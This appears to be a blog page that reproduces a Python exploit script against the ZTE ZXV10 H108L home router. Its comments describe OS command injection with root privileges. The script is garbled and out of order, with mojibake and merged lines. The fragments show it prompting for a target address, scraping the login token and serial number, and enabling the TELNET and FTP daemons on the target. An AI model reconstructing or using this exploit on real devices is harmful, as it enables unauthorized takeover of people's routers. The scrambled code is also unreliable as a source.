![]() ![]() Print "Enabling TELNET deamon on " + target + ". Print "Enabling FTP deamon on " + target + ". Print "No response on '" + cmd + "' command!" Print " Serial Number: " + GREEN + Frm_SerialNumber + RESETįrm_SoftwareVerExtent = re. findall( r'Frm_ModelName" class="tdright">(.*)(.*)', html_data)įrm_SerialNumber = str( Frm_SerialNumber) Print " Login token: " + GREEN + Frm_Logintoken + RESETįrm_ModelName = re. ![]() # Check router information on "template.gch" page write( " \n")įrm_Logintoken = str( Frm_Logintoken)ĭo_login = findall( r'Frm_Logintoken"\).value = "(.*)" ', html_data) Target = raw_input( " \nEnter the address of the ZTE router \n> ") # By using this vulnerability an attacker is able to execute system command with root privileges. # ZTE ZXV10 H108L router with WIND Hellas's custom software is vulnerable to OS Command injection attack.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |